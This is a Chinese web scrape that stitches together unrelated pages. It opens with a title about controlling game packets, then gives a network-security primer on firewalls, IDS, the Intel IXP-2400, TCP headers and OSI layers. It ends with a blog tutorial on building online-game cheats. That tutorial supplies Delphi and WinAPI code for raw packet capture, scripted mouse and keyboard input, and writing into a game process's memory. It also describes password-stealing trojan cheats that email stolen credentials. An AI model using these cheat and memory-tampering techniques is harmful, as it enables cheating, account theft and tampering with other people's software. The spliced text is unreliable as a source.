如何掌握,比对,判断,控制dnf封包吧

最深入的网络安全设备知识讲解_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
最深入的网络安全设备知识讲解
&&最深入的网络安全设备知识讲解
阅读已结束,下载文档到电脑
想免费下载更多文档?
定制HR最喜欢的简历
下载文档到电脑,方便使用
还剩11页未读,继续阅读
定制HR最喜欢的简历
你可能喜欢__网络通信专栏
网络安全的需求
据统计,2000年企业及政府部门遭受骇客(Hacker)攻击的概率高达85%,而网络安全的漏洞不是防堵骇客入侵就解决了,其它像遭窥探者窃取机密性数据,或是心怀不满的员工蓄意破坏系统内重要档案,警觉性不足的员工外泄重要密码、不小心由Email引入计算机病毒等,都是威胁网络安全的几个危险因子。
为了让区域内网络维持安全运作,建立一套安全防护网才是根本解决之道,较完整的防卫机制大概分为三大类:
(一)Network Security (网络安全)
(Firewalls, Intrusion detection system, Intrusion
prevention System, Wireless security, Mail security,
E-commerce security,
Load balancer /High Availability)
(二)Content Filtering (内容过滤)
(Antivirus, Internet /Web / URL filters, Spam
filtering,
Content security)
(三)Encryption (加密)
(Virtual Private Network, Public Key Infrastructure
Certification Architecture,
三种市场应用各有不同的系统规格需求,VPN 的系统需将讯息全数打乱再丢到网络上,透过加密机制在公开的网络里建立起加密通道(Encrypted
Tunnel),接收端再解密取得真实讯息,在浩瀚的因特网内建立起安全私密的虚拟局域网络;Firewall则像大楼管理员,检查来访封包的通行许可证,包含检查封包的来源、目的地、连接埠等字段,但是防火墙并没有办法挡掉所有的入侵者,此时就须要另一道防线IDS;IDS
就像网络上的监控摄影机,可以分析流经的封包数据,侦测未经授权的行为,IDS大致区分为「网络系统」跟「主机系统」两类。基本上IDS需求的系统处理能力可以涵盖VPN及Firewall的需求.
入侵侦测系统的应用
防火墙与IDP的差异在于, 防火墙仅能就网络封包做到2到4层的检测,就来源地址/端口号以及目的地址/服务进行控管;而IDP可以做到4到7层(也就是应用层)的检测,因此IDP可以发觉包藏在应用层里的恶意攻击码(譬如蠕虫攻击、缓冲溢位攻击便藏匿于此),并予以狙击。IDP内建庞大的攻击特征数据库,可以有效阻绝已知的攻击;IDP也透过「异常协议侦测」的方式,实时检查并将不符合RFC规范的网络封包丢弃。所以在「攻击防御」方面,IDP远胜于防火墙之上。
由于IDP一般仅能就IP以及IP群组决定封包放行权限,所以在「资源存取权限管理」方面,防火墙较优于IDP。然而,防火墙并无法有效管控企业内部使用者使用P2P、实时通讯(Instant
Messenger、Yahoo Messenger)等软件、也无法杜绝利用Web-Mail或者Web-Post等方式将机密外泄,这些问题需要能监控4到7层的IDP设备才能控管。目前已经有少部分的IDP产品采用IXP2xxx芯片利用其「深层检测」的优势,有效地解决上述问题。
IDP可以防止蠕虫由外入侵至企业网络内部,而如果防火墙要防止蠕虫攻击,仅能消极地关闭某些Port。但一般的档案型病毒,则不在IDP及防火墙的防护范围内。因此资安的最后一层防护网便是在使用者端安装防毒软件。
各项资安产品皆有其擅长与不足之处,因此建议企业资安负责人员深入了解以及比较这些资安产品的差异,并依据企业的实际需要充分搭配使用,加强资安防护网的纵深,以确保企业的网络安全。
后面我们就以较复杂的IDS为例做IXP-2400的应用说明。
网络处理器的时代已经来临,它可有效解决网络交通拥塞的问题,也可处理复杂的封包运算。不论如何,Inetel
IXA架构已经正确的跨出第一步,接下来就须要更多的平台设计者投入开发工作,以及更多的应用开发者投入资源,发展软件程序,逐步建立完整的可携式Microblocks。网络兴起、频宽加速拓展,使整个网络通讯的市场板块不断的在调整、挪动,凌华科技与Intel合作,共同推广IXP-2XXX网络处理器的应用,针对网络安全其中封包处理过程以下进一步来讨论。
何谓封包与功能:
在网络安全论述中,所有传输动作是经由封包完成的, 封包就很像我们在邮寄信件的时候那个邮件的模样了!信纸内容总是得放入信封吧?而信封上面会写上发信人住址,受收信人住址与姓名.
所以,一封邮件主要会有两个部分,分别是:『信封表面的信息部分、与信封内部的信件内容!』。同样的,网络的信息封包主要也是分为两个部分,一个是表头
( Header ) 的部分,另一个则是内容 ( messages ) 的部分!而一个封包要传送到哪里去,都是通过
Header 的讯息部分进行分析而传送的!那么 Header 有哪些重要的信息呢?主要就如同上面提到的,至少会有来源与目标
IP 、来源与目标 Port等等!封包是怎么在两部主机之间进行传送的呢?事实上,封包的传送是相当复杂的,而且封包的状态不同
(TCP/UDP) 也会有不一样的传送机制。这里举一个『相对比较可靠的封包传送方式』来介绍。如下图所示:
较可靠的封包传送状态
当发送封包者发送出一个封包给接受者后,接受者在『正确的接到』这个封包之后,会回复一个响应封包
( Acknowledgment ) 给发送者,告诉他接受者已经收到了!当发送端收到这个响应封包后,才会继续发送下一个封包出去,否则就会将刚刚的封包重新发送一次!这种封包的传递方式因为考虑到对方接到的封包的状态,所以算是比较可靠的一种方式。目前因特网上面常见的封包是
TCP 与 UDP ,其中 TCP 的联机方式中,会考虑到较多的参数,他是一种联机模式(Connection
Oriented)的可靠传输,至于 UDP 则省略了响应封包的步骤,所以是一种非联机导向的非可靠传输。在一个
TCP 封包的传送过程中,因为至少需要传送与响应等封包来确定传送出去的数据没有问题,所以他是相当可靠的一种传输方式,不过就是传输与响应之间的时间可能会拖比较久一点。至于
UDP 封包就因为少了那个确认的动作,所以虽然他是较不可靠一点,但是速度上就比 TCP 封包要来的快!底下我们将继续介绍
TCP, UDP 以及 ICMP 等封包信息的内容. TCP 与 UDP 封包的建立是有差异存在的!针对TCP封包Header的内容作个简单的介绍!
TCP 封包的 Header 内容主要如下:
TCP 封包的 Header 信息
Port & Destination Port ( 来源端口口 & 目标端口口
):来源与目标的端口,这个容易了解吧!上面刚刚提过那个埠口的观念。再次的强调一下,小于
1024 以下的 Port 只有 root 身份才能启用,至于一般 Client 发起的联机,通常是使用大于
1024 以上的埠口!
Number ( 封包序号 ):在OSI 七层协定里面提到过,由于种种的限制,所以一次传送的封包大小大约仅有数千
bytes ,但是我们的资料可能大于这个封包所允许的最大容量,所以就得将我们的数据拆成数个封包来进行传送到目的地主机的动作。那么对方主机怎么知道这些封包是有关连性的呢?就得通过这个
Sequence Number 来辅助了。当发送端要发送封包时,会为这个封包设定一个序号,然后再依据要传送的数据长度,依序的增加序号。也就是说,我们可以使用递增的值来替下一个封包作为它序号的设定!
Acknowledgment
Number ( 回应序号 ) :封包传输过程中,我们知道在接受端接收了封包之后,会响应发送端一个响应封包,那个响应的信息就是在这里。当接收端收到
TCP 封包并且通过检验确认接收该封包后,就会依照原 TCP 封包的发送序号再加上数据长度以产生一个响应的序号,而附在回应给发送端的响应封包上面,这样发送端就可以知道接收端已经正确的接收成功该
TCP 封包了!所以说, Sequence 与 Acknowledgment number
是 TCP 封包之所以可靠的保证!因为他可以用来检测封包是否正确的被接受者所接收!
Data Offset (资料补偿):这是用来记录表头长度用的一个字段。
Reserved (保留):未使用的保留字段。
Control Flag (控制标志码):控制标志码在
TCP 封包的联机过程当中,是相当重要的一个标志,先来说一说这六个句柄,然后再来讨论吧:
* Urgent data :如果 URG 为 1 时,表示这是一个紧急的封包数据,接收端应该优先处理;
* Acknowledge field significant
:当 ACK 这个 Flag 为 1 时,表示这个封包的 Acknowledge Number
是有效的,也就是我们上面提到的那个回应封包。
* Push function :如果 PSH 为 1 的时候,该封包连同传送缓冲区的其它封包应立即进行传送,而无需等待缓冲区满了才送。接收端必须尽快将此数据交给程序处理。
* Reset :如果 RST 为 1 的时候,表示联机会被马上结束,而无需等待终止确认手续。
* Synchronize sequence number
:这就是 SYN 标志啦!当 SYN 为 1 时,那就表示发送端要求双方进行同步处理,也就是要求建立联机的意思,这个
SYN 是相当重要的一个 Flag 喔!
* No more data fro sender (Finish)
:如果封包的 FIN 为 1 的时候,就表示传送结束,然后双方发出结束响应,进而正式进入 TCP
传送的终止流程。
Window (滑动窗口):与接收者的缓冲区大小有关的一个参数。
Checksum(确认):当数据要由发送端送出前,会进行一个检验的动作,并将该动作的检验值标注在这个字段上;而接收者收到这个封包之后,会再次的对封包进行验证,并且比对原发送的
Checksum 值是否相符,如果相符就接受,若不符就会假设该封包已经损毁,进而要求对方重新发送此封包!
Urgent Pointer:指示紧急数据所在位置的字段。
Option:当需要
client 与 Server 同步动作的程序,例如 Telnet ,那么要处理好两端的交互模式,就会用到这个字段来指定数据封包的大小,不过,这个字段还是比较少用的!
为什么需要用到 Intel IXP-2XXX
网络处理器
因特网、企业网络等网络应用的频宽需求急剧上升,传输、检查、拆解、组合、搜寻、内容比对、转递等IP封包运算处理动作,以往可以靠软件程序在一般X86微处理器上运行,搭配以网络卡做封包出入口。但是近年来这些封包的运算处理越来越复杂,将数据输入处理单元,完后再将结果送往输出单元,慢速处理造成的时间延迟会严重影响到数据吞吐量,无法满足Line
Rate Operation的需求。Intel 公司提供的网络处理器系列产品专门用来解决这样的问题,IXP-4XX属于较低阶的系列,IXP-2XXX系列高阶网络处理器,文中将以IXP-2400处理器在凌华科技cPCI-6240系列产品的设计为例做说明。
以下将先介绍IXP-2XXX处理器的功能特性,再探讨处理器的平台设计、应用开发,最后探讨它在网络安全领域的应用,以入侵侦测系统为实例做说明。
Intel XP-2XXX系列网络处理器大致包含:IXP-2400、Westport,
IXP-2800及IXP-2850,请参考表一的性能差异。除此之外,Intel并考虑比照IXP-42X系列做法,高度整合MACs等功能区块进来,建造优异的性价比产品,使这一系列处理器的应用更普及化。
IXP-2XXX系列比较表
全系列IXP-2XXX网络处理器都可拆解为『控制管道』(Control
Plane)及『数据管道』(Data Plane)两大部分。参考图一 IXP-2400网络处理器,它内建一颗个600MHz
32-bit XScale来负责Control Plane的处理工作,XScale执行相当底层的控制工作,包括信息传送,还有跟系统内其它处理器的沟通。Data
Plane则由内建的八颗个微处理引擎(Micro-Engine Version 2, MEv2)来做平行处理,MEv2是XScale精简下来的
(Reduced) 可程序处理器,使用者可用Micro-Code汇编语言或是高阶Micro-C语言撰写应用程序,透过指令告诉这八颗个MEv2怎样去处理封包运算,达到应用目的。
IXP-2400的外部接口
图一是IXP-2400示意图外观,它有两个信道的QDR
SRAM接口,存放重要的数据结构,比如:Route Tables, Free Buffer
Pools,Flow State Tables,Queue Descriptors等等重要的讯息,其中一个信道还可以接一个协处理器,做TCP/IP封包比对时的内存搜寻引擎,加速决定封包的协议属性跟流向(Flow)。DDR
DRAM则用来储存封包以及大量的State tables,另外C-bus接口可以连接第二个处理器,这是采用一进一出架构的双处理器设计时用的。
另两个重要接口,一个是64-bit/66MHz PCI
2.2接口,作为Control Plane连通的Bus,可以透过此接口外挂控制处理器,像是PrPMC控制卡;另一个是Flash界面,是存取RedBoot韧体的通道,Redboot相当于X86系统的BIOS;媒体及切换接口(Media
and Switch Fabric Interface, MSF)是网络封包进出处理器的主要途径,视应用可以规划为SPI-3、CSIX或是UTOPIA
Level2接口。
图二是IXP-2400内部示意图,内部的SHaC
是一个多功能控制单元,内含Hash单元,可以建立48-,64-或是128-bit宽的 Hash
indices,XScale与MEv2可存取Hash来帮助Table的搜寻,特别是要搜寻的Keys很大时;第二个单元是16KB的Scratch
Pad memory,这是处理器内第三个内存资源,XScale与MEv2可共同存取,三种内存资源可以让海量存储器存取同时间平行发生;第三个单元是Control
and Status Register (CSR),提供9颗个处理器(1 * XScale
+ 8* MEv2)互相之间沟通用途。
除此之外,还有 XScale 外围,包含中断控制器、Timers,
UART、GPIO等单元。在处理器内部,XScale、MEv2、DRAM Controller、SRAM
Controller、T/R-Buffer之间透过 Chassis Bus,将 Data Plane
的路径在处理器内部连通起来,这些控制单元可以共享 SRAM、DRAM 等内存资源做数据交换。
图二:IXP-2400功能单元及数据信道
(取材自Intel IXA架构及应用一书)
网络处理器的『平台设计』、『应用开发』
(一) 平台规划、开发
平台规划 设计IXP-2XXX平台首先要先为产品做准确的定位,定义平台最终应用、频宽需求、封包处理效能等级。若是想一半接到ATM网络,则MSF接口有一半要规划成Utopia
Level 2接口,连接的ASIC像是Intel IXF- Cell/Packet
Framer;若是要直接连IP网络,则MSF接口规划成SPI-3或是CSIX,连接像Intel
IXF-1104 (Quad Giga-E MACs的ASIC);或是接FIC(Fabric
Interface Controller) 的ASIC。另外规划时要全面考虑:Control
Plane的处理效能、是否外挂辅助处理器、开机影像文件下载速度;Data Plane则须考虑SRAM大小、DRAM资源使用、是否须加密功能
(IXP-2850有)、是否外挂网络搜寻加速器、是否外挂内容检查加速器等、要多少个网络接口。这些硬件规格要根据功能应用,做整体效能评估才行,在开案初期要审慎评估。
平台开发 包括硬件、韧体(Redboot)、系统支持套件(Board
Supporting Package, BSP),BSP内含组件驱动程序。其中硬件设计跟一般X86运算平台没什么两样,记得要预留软件除错端口,就像X86-CPU的
ITP Port一样;Redboot韧体则相当于X86 BIOS,系统初始化、自我测试、Boot
Loader都包在Redboot内;Redboot及BSP可以通过Intel IXA SDK得到帮忙,建立以XScale为处理核心的操作系统平台,最后这三大要素即可建立一个完整的网络处理器平台。
(二) 应用程序开发
Intel 建立了IXA 软件可携式架构,让今天花力气辛辛苦苦在IXP-2400建立起来的软件,明天在下一代IXP-2XXX仍然适用,而这个软件架构可以简单用图三表示。
应用程序的开发也可以通过Intel IXA SDK得到帮忙,考虑到投资杠杆效应,Intel
IXA软件程序架构采模块化,SDK提供一些基本的microblocks,开发者再开发自有的microblocks,将这些microblocks视为基础组件(Building
Blocks),去组合实现实际的功能应用,让开发者的工作简单化,也缩短TTM时间。
图三:Intel IXA 可携式软件架构
(取材自Intel IXA架构及应用一书)
图四是采用IXP-2400为核心建立的IDS系统结构图,凌华采用IXP-2400内建的XScale去控制管理Control
Plane的组件,内建的八个MicroEngine去收送处理封包的分类及内容比对,处理Data
Plane的运算。IXP-2400的QDR SRAM通道0也叫做LA-1(Look Aside
Interface)接口,可以选择接市面上现有的TCAM(Ternary Content Addressable
Memory) 辅助处理器,帮忙做第三层以下封包数据搜寻比对的工作,帮IXP-2400处理器卸载(offload)一些运算负担。
图四 IXP-2400在网络安全的应用-『入侵侦测系统』方块图
图五 ADLINK cPCI-6240系列网络安全平台
网络安全系统内最关键性的功能可以说是封包表头辨识(Classification)及内容检查(Content
Inspection),表头辨识系针对其流向、连结、输入端口及目的地址等做比对;内容检查则有复杂的算法,处理频宽及内存容量需求极高,很显然内容检查即将是此系统非常严重的交通瓶颈所在,这个运算将耗用大量IXP-2400网络处理器的运算资源。因此必须采用另一个处理器卸载此运算,有两种方法可行,其一是如图四:加入一颗个可程序内容检查引擎(Programmable
CIE, Content Inspection Engine),比如IDT PAX.port
2500 CIE;或是在封包经网络处理器集结成较大封包后,进入一张专属内容检查的高速运算服务器,比如ADLINK
cPCI-6860 Dual-Xeon Server Blade。加CIE的做法可以卸载95%
的MicroEngine资源使用量,删除掉85%的MicroCode,同时削减75%内存频宽使用量,成本可大大节省,TTM(Time
to Market)时间可以显著缩减。加一张专属服务器则维持旧有软件延续使用,节省软件开发的时间及人力成本,两者各有优点,但是CIE是纯硬件运算所以效率较好,长期来看应会成为较受欢迎的选择。
与 OSI 比较和说明
在网络世界中计算机与计算机之间是透过特种协议来传输和沟通, 当今此协议是以TCP/IP (Transmission
Control Protocol / Internet Protocol) 是由IETF (Internet
Society's Internet Engineering Task Force) 根据
DoD (Department Of Defense) 模型所制定的标准和 OSI (Open
System Interconnection ) 是由ISO (International
Standard Organization)所制定的标准, 下面三层偏硬件,上面三层偏软件,中间一层偏软件硬件间的沟通。两种标准协议图(一)和图(二)来作简单说明.
TCP/IP各层的功能如下:
网络存取层 (Network Access Layer) 网络存取层相当于 OSI 的实体层及数据链结层,主要负责网络实体连接的部份。事实上,TCP/IP
并未定义这一层的协议,换言之,它可以架构在多种网络存取接口上,如 Ethernet、Token-Rign、FDDI、…等,TCP/IP
只须提供这些接口的驱动程序即可。TCP/IP的网络存取层涵盖 OSI 的数据链结层 (Data
Link Layer) 及实体层 (Physical Layer)。在这一层传送的数据称为数据框
网际层 (Internet Layer) 网际层的主要任务是连接发送端到接收端之间的中继节点,提供讯息送达的服务,如:辨识地址、数据传送路径选择、…等。网际层主要协议为
IP (Internet Protocol),及 ARP (Address Resolution
Protocol)、RARP (Reverse Address Resolution Protocol)、ICMP
(Internet Control Message Protocol) 等协定。TCP/IP
的网际层相当于 OSI 的网络层 (Network Layer)。在这一层传送的数据称为数据包
(Datagram)。
运输层 (Transport Layer) 运输层又称为主机对主机层
(Host to Host Layer) ,任务是提供主机对主机的讯息送达服务。主要协议有
TCP (Transmission Control Protocol) 及 UDP (User
Datagram Protocol)。TCP/IP 的运输层也相当于 OSI 的运输层 (Transport
Layer)。在这一层传送的数据,TCP 协议称为 Segment,UDP 则称为 Packet。
应用层 (Application Layer) 应用层的任务提供各种应用程序协议,为使用者提供服务,这一层的协议相当多,著名的应用层协议包括:TELNET、FTP、SMTP、POP3、SNMP、NNTP、DNS、NIS、NFS、HTTP、…等。TCP/IP
的应用层涵盖 OSI 的应用层 (Application Layer)、表现层 (Presentation
Layer)、会议层 (Session Layer) 的功能,事实上 TCP/IP 并未定义
Presentation Layer 及 Session Layer 的相关协议,相关功能是由应用程序自行处理。在这一层传送的数据,TCP
的程序称为 Stream,UDP 的程序则称为 Message。
OSI各层的功能如下:
实体层 (Physical Layer) 定义数据在线路上的传输方法。主要是负责传送信息,并将硬设备(如网络卡,传输
媒介)送来的讯息,转换计算机认识的讯息,如 0, 1, ... 等。
数据链路层 (Data Link Layer) 定义单一传输在线点对点间之可靠性传输方法。将实体层传来
0,1 讯息组成 Frame (资 料框),负责流量控制(通常接收方应比发送方快),定义 Token-Ring、Ethernet、…等。
网络层 (Network Layer) 定义网络上任意不相邻两点间之可靠性传输方法,规划数据在网络中最佳传输路径,以
便将 Packet 传送到目的地。
运输层 (Transport Layer) 负责数据在两点间传输之可靠性及透明性,将数据安全无误送达目的地,尤其是来自上层的多样传输的问题。包括检查遗失、重复封包、…。
会议层 (Session Layer) 负责两个节点间的联机之建立,管理、终止及错误恢复。如:所用的通讯协议,通讯模
式,如何结束通讯、…等。
表现层 (Presentation Layer)
数据格式的问题,主要是将数据转成计算机或系统程序看得懂的模式,如:数据压缩/解压 缩,资料加密/解密、…。
应用层 (Application Layer) 提供各种服务,做为应用程序与网络间的沟通接口。网络游戏外挂核心封包揭密
- CSDN博客
网络游戏外挂核心封包揭密
网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一,在这里就让我们一起研究一下这一个问题吧。  别看这是封包这一问题,但是涉及的技术范围很广范,实现的方式也很多(比如说APIHOOK,VXD,Winsock2都可以实现),在这里我们不可能每种技术和方法都涉及,所以我在这里以Winsock2技术作详细讲解,就算作抛砖引玉。  由于大多数读者对封包类编程不是很了解,我在这里就简单介绍一下相关知识:  APIHooK:  由于Windows的把内核提供的功能都封装到API里面,所以大家要实现功能就必须通过API,换句话说就是我们要想捕获数据封包,就必须先要得知道并且捕获这个API,从API里面得到封包信息。  VXD:  直接通过控制VXD驱动程序来实现封包信息的捕获,不过VXD只能用于win9X。  winsock2:  winsock是Windows网络编程接口,winsock工作在应用层,它提供与底层传输协议无关的高层数据传输编程接口,winsock2是winsock2.0提供的服务提供者接口,但只能在win2000下用。  好了,我们开始进入winsock2封包式编程吧。  在封包编程里面我准备分两个步骤对大家进行讲解:1、封包的捕获,2、封包的发送。  首先我们要实现的是封包的捕获:  Delphi的封装的winsock是1.0版的,很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口,才可以使用winsock2。  1、如何做winsock2的接口?  1)我们要先定义winsock2.0所用得到的类型,在这里我们以WSA_DATA类型做示范,大家可以举一仿三的来实现winsock2其他类型的封装。  我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: var WSData: TWSAData): I,大家会发现WSData是引用参数,在传入参数时传的是变量的地址,所以我们对WSA_DATA做以下封装:const WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; type PWSA_DATA = ^TWSA_DATA; WSA_DATA = record wVersion: W wHighVersion: W szDescription: array[0..WSADESCRIPTION_LEN] of C szSystemStatus: array[0..WSASYS_STATUS_LEN] of C iMaxSockets: W iMaxUdpDg: W lpVendorInfo: PC
TWSA_DATA = WSA_DATA;   2)我们要从WS2_32.DLL引入winsock2的函数,在此我们也是以WSAStartup为例做函数引入:function WSAStartup(wVersionRequired: var WSData: TWSAData): I implementation const WinSocket2 = 'WS2_32.DLL'; function WSAS external winsocket name 'WSAStartup';   通过以上方法,我们便可以对winsock2做接口,下面我们就可以用winsock2做封包捕获了,不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题,所以我们在这里以IP数据包为例做封包捕获,如果下面的某些数据类型您不是很清楚,请您查阅MSDN:  1)我们要起动WSA,这时个要用到的WSAStartup函数,用法如下:INTEGER WSAStartup( wVersionRequired: word, WSData: TWSA_DATA);    2)使用socket函数得到socket句柄,m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); 用法如下:INTEGER socket(af: Integer, Struct: Integer, protocol: Integer); m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP);   在程序里m_hSocket为socket句柄,AF_INET,SOCK_RAW,IPPROTO_IP均为常量。  3)定义SOCK_ADDR类型,跟据我们的网卡IP给Sock_ADDR类型附值,然后我们使用bind函数来绑定我们的网卡,Bind函数用法如下:Type IN_ADDR = record S_addr : PCEType TSOCK_ADDR = record sin_family: Wsin_port: Wsin_addr : IN_ADDRsin_zero: array[0..7] of C EvarLocalAddr:TSOCK_ADDR;LocalAddr.sin_family: = AF_INET;LocalAddr.sin_port: = 0;LocalAddr.sin_addr.S_addr: = inet_addr('192.168.1.1'); //这里你自己的网卡的IP地址,而inet_addr这个函数是winsock2的函数。bind(m_hSocket, LocalAddr, sizeof(LocalAddr));   4)用WSAIoctl来注册WSA的输入输出组件,其用法如下:INTEGER WSAIoctl(s:INTEGER, dwIoControlCode : INTEGER, lpvInBuffer :INTEGER,cbInBuffer : INTEGER, lpvOutBuffer : INTEGER,cbOutBuffer: INTEGER, lpcbBytesReturned : INTEGER, lpOverlapped : INTEGER, lpCompletionRoutine : INTEGER);   5)下面做死循环,在死循环块里,来实现数据的接收。但是徇环中间要用Sleep()做延时,不然程序会出错。  6)在循环块里,用recv函数来接收数据,recv函数用法如下:INTEGER recv (s : INTEGER, buffer:Array[0..4095] of byte, length : INTEGER,flags : INTEGER,);   7)在buffer里就是我们接收回来的数据了,如果我们想要知道数据是什么地方发来的,那么,我们要定义一定IP包结构,用CopyMemory()把IP信息从buffer里面读出来就可以了,不过读出来的是十六进制的数据需要转换一下。  看了封包捕获的全过程序,对你是不是有点起发,然而在这里要告诉大家的是封包的获得是很容易的,但是许多游戏的封包都是加密的,如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。 四种网络游戏外挂的设计方法在几年前我看到别人玩网络游戏用上了外挂,做为程序员的我心里实在是不爽,想搞清楚这到底是怎么回事。就拿了一些来研究,小有心得,拿出来与大家共享,外挂无非就是分几种罢了(依制作难度):  1、动作式,所谓动作式,就是指用API发命令给窗口或API控制鼠标、键盘等,使游戏里的人物进行流动或者攻击,最早以前的&石器&外挂就是这种方式。(这种外挂完全是垃圾,TMD,只要会一点点API的人都知道该怎么做,不过这种外挂也是入门级的好东东,虽然不能提高你的战斗力,但是可以提高你的士气)  2、本地修改式,这种外挂跟传统上的一些游戏修改器没有两样,做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现,&精灵&的外挂这是这种方式写成的,它的难点在于找到那些地址码,找地址一般地要借助于别人的工具,有的游戏还有双码校验,正正找起来会比较困难。(这种外挂,比上一种有一点点难度,但是这种外挂做起来能够用,也是有一定难度的啦~~,这种外挂可以很快提升你对内存地址的理解及应用,是你编程技术提高的好东东)  3、木马式,这种外挂的目的是帮外挂制作者偷到用户的密码(TMD,&烂&就一个字,不过要知已知彼所以还是要谈一下啦~~),做这种外挂有一定的难度,需要HOOK或键盘监视技术做底子,才可以完成,它的原理是先首截了用户的帐号或密码,然后发到指定邮箱。(我以前写过这样的东东,但是从来没有用过,我知道这种东东很不道德,所以以后千万别用呀!)  4、加速式,这种外挂可以加快游戏的速度&&(对不起大家,这种东东我没有实际做过,所以不能妄自评,惭愧)  这几种外挂之中,前三种可以用VB,Delphi等语言比较好实现,后两种则要用VC等底层支持比较好的编程工具才好实现。   动作式外挂  首先,先来谈一下动作式的外挂,这也是我第一次写外挂时做的最简单的一种。  记得还在&石器&时代的时候,我看到别人挂着一种软件(外挂)人物就可以四外游走(当时我还不知道外挂怎么回事),于是找了这种软件过来研究(拿来后才听别人说这叫外挂),发现这种东东其实实现起来并不难,仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已,看后就有实现这功能的冲动,随后跑到MSDN上看了一些资料,发现这种实现这几个功能,只需要几个简单的API函数就可以搞定:  1、首先我们要知道现在鼠标的位置(为了好还原现在鼠标的位置)所以我们就要用到API函数GetCursorPos,它的使用方法如下:BOOL GetCursorPos( LPPOINT lpPoint // address of structure for cursor position );    2、我们把鼠标的位置移到要到人物走到的地方,我们就要用到SetCursorPos函数来移动鼠标位置,它的使用方法如下:BOOL SetCursorPos(int X, // horizontal position int Y // vertical position);   3、模拟鼠标发出按下和放开的动作,我们要用到mouse_event函数来实现,具休使用方法用下:VOID mouse_event(DWORD dwFlags, // flags specifying various motion/click variantsDWORD dx, // horizontal mouse position or position changeDWORD dy, // vertical mouse position or position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information);   在它的dwFlags处,可用的事件很多如移动MOUSEEVENTF_MOVE,左键按下MOUSEEVENTF_LEFTDOWN,左键放开MOUSEEVENTF_LEFTUP,具体的东东还是查一下MSDN吧~~~~~   好了,有了前面的知识,我们就可以来看看人物移走是怎么实现的了:getcursorpos(point);setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);setcursorpos(point.x,point.y);   看了以上的代码,是不是觉得人物的游走很简单啦~~,举一仿三,还有好多好东东可以用这个技巧实现(我早就说过,TMD,这是垃圾外挂的做法,相信了吧~~~),接下来,再看看游戏里面自动攻击的做法吧(必需游戏中攻击支持快捷键的),道理还是一样的,只是用的API不同罢了~~~,这回我们要用到的是keybd_event函数,其用法如下:VOID keybd_event(BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke);   我们还要知道扫描码不可以直接使用,要用函数MapVirtualKey把键值转成扫描码,MapVirtualKey的具体使用方法如下:UINT MapVirtualKey(UINT uCode, // virtual-key code or scan codeUINT uMapType // translation to perform);   好了,比说此快接键是CTRL+A,接下来让我们看看实际代码是怎么写的:keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);keybd_event(65,mapvirtualkey(65,0),0,0);keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);   首先模拟按下了CTRL键,再模拟按下A键,再模拟放开A键,最后放开CTRL键,这就是一个模拟按快捷键的周期。  (看到这里,差不多对简易外挂有了一定的了解了吧~~~~做一个试试?如果你举一仿三还能有更好的东东出来,这就要看你的领悟能力了~~,不过不要高兴太早这只是才开始,以后还有更复杂的东东等着你呢~~)  本地修改式外挂  现在我们来看看,比动作式外挂更进一步的外挂--本地修改式外挂的整个制作过程进行一个详细的分解。  具我所知,本地修改式外挂最典型的应用就是在&精灵&游戏上面,因为我在近一年前(&精灵&还在测试阶段),我所在的公司里有很多同事玩&精灵&,于是我看了一下游戏的数据处理方式,发现它所发送到服务器上的信息是存在于内存当中(我看后第一个感受是:修改这种游戏和修改单机版的游戏没有多大分别,换句话说就是在他向服务器提交信息之前修改了内存地址就可以了),当时我找到了地址于是修改了内存地址,果然,按我的想法修改了地址,让系统自动提交后,果然成功了~~~~~,后来&精灵&又改成了双地址校检,内存校检等等,在这里我就不废话了~~~~,OK,我们就来看看这类外挂是如何制作的:  在做外挂之前我们要对Windows的内存有个具体的认识,而在这里我们所指的内存是指系统的内存偏移量,也就是相对内存,而我们所要对其进行修改,那么我们要对几个Windows API进行了解,OK,跟着例子让我们看清楚这种外挂的制作和API的应用(为了保证网络游戏的正常运行,我就不把找内存地址的方法详细解说了):  1、首先我们要用FindWindow,知道游戏窗口的句柄,因为我们要通过它来得知游戏的运行后所在进程的ID,下面就是FindWindow的用法:HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name);   2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:DWORD GetWindowThreadProcessId(HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier);  3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:HANDLE OpenProcess(DWORD dwDesiredAccess, // access flag BOOL bInheritHandle, // handle inheritance flag DWORD dwProcessId // process identifier );   在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。  4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:BOOL WriteProcessMemory(HANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data toDWORD nSize, // number of bytes to writeLPDWORD lpNumberOfBytesWritten // actual number of bytes written );   5、下面用CloseHandle关闭进程句柄就完成了。  